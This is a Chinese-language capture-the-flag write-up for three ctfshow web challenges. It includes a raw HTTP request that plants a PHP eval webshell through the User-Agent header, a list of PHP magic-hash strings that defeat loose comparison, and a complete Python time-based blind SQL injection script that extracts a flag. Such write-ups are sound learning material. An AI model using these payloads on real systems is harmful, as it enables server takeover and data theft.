ctfshow web刷题

web4

在 URL 中添加一句话木马会被编码，因此改为写在 User-Agent 请求头中。

GET / HTTP/1.1
Host: 0962422f-8459-4372-8ed2-acebe03635c0.challenge.ctf.show:8080
User-Agent: <?php @eval($_POST[a]);?> Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

web5

md5：下面这些字符串的 MD5 值都以 0e 开头且其后全为数字，PHP 用 == 松散比较时会把它们当作数值 0 而判为相等；服务端应改用 === 或 hash_equals() 进行比较。

QNKCDZO
240610708
s878926199a
s155964671a
s214587387a

web6

password 字段存在 SQL 注入，并且过滤了空格，所以下面的脚本用 /**/ 代替空格，进行基于时间的盲注。

import requests
import time
from functools import wraps

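def spend_time(func):
    """Decorator that prints how long each call to *func* takes.

    The wrapped function's return value is passed back to the caller; the
    original wrapper dropped it, so every decorated function returned None.

    Args:
        func: The callable to time.

    Returns:
        A wrapper with the same name and docstring as *func* (via
        functools.wraps) that prints "spend time: <seconds>" after each call.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        # perf_counter is monotonic, so a wall-clock adjustment during the
        # call cannot produce a negative or inflated duration.
        started = time.perf_counter()
        result = func(*args, **kwargs)
        print("spend time:", time.perf_counter() - started)
        return result

    return wrapper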


def and_operation():
    """Read the challenge flag bit by bit from login response latency.

    This is the write-up's time-based blind SQL injection script for the web6
    challenge instance. Each request puts a conditional `sleep(2)` into the
    `password` form field, keyed on one bit of one character of
    `select flag from flag`; a response slower than 2 seconds is read as
    "bit set". `/**/` stands in for spaces because the write-up says spaces
    are filtered.

    Defender's view: the traffic is up to 7 near-identical login POSTs per
    recovered character, with latencies splitting into "normal" and
    ">= 2 s", and password values containing `/**/`, `sleep(` and a trailing
    `#`. Filtering spaces does not stop it, as the payload shows; binding the
    password as a query parameter does.

    Prints the recovered prefix after each character. Returns None.
    """
    # NOTE(review): the published listing lost its indentation; the nesting
    # below is reconstructed, including print(info) inside the outer loop -
    # confirm against the author's original.
    url = "http://dceb0f35-65a5-4f40-856e-ecdc2d487f30.challenge.ctf.show:8080/"
    flag_payload = "1'/**/or/**/if((ascii(substr((select/**/flag/**/from/**/flag),{0},1))&{1}),sleep(2),1)/**/#"
    info = ""
    for position in range(1, 100):
        value = 0
        # Seven single-bit masks (1, 2, ..., 64) cover the 7-bit ASCII range.
        for bit_mask in (1 << shift for shift in range(7)):
            form = {
                "username": "admin",
                "password": flag_payload.format(position, bit_mask),
            }
            sent_at = time.time()
            requests.post(url=url, data=form)
            elapsed = time.time() - sent_at
            # The threshold equals the injected sleep, so ordinary network
            # latency above 2 s would be misread as a set bit.
            if elapsed > 2:
                value |= bit_mask
        # No bit delayed the response: treated as the end of the string.
        if value == 0:
            break
        info += chr(value)
        print(info)


if __name__ == "__main__":
    # Script entry point: run the extraction only when executed directly,
    # not when this file is imported as a module.
    and_operation()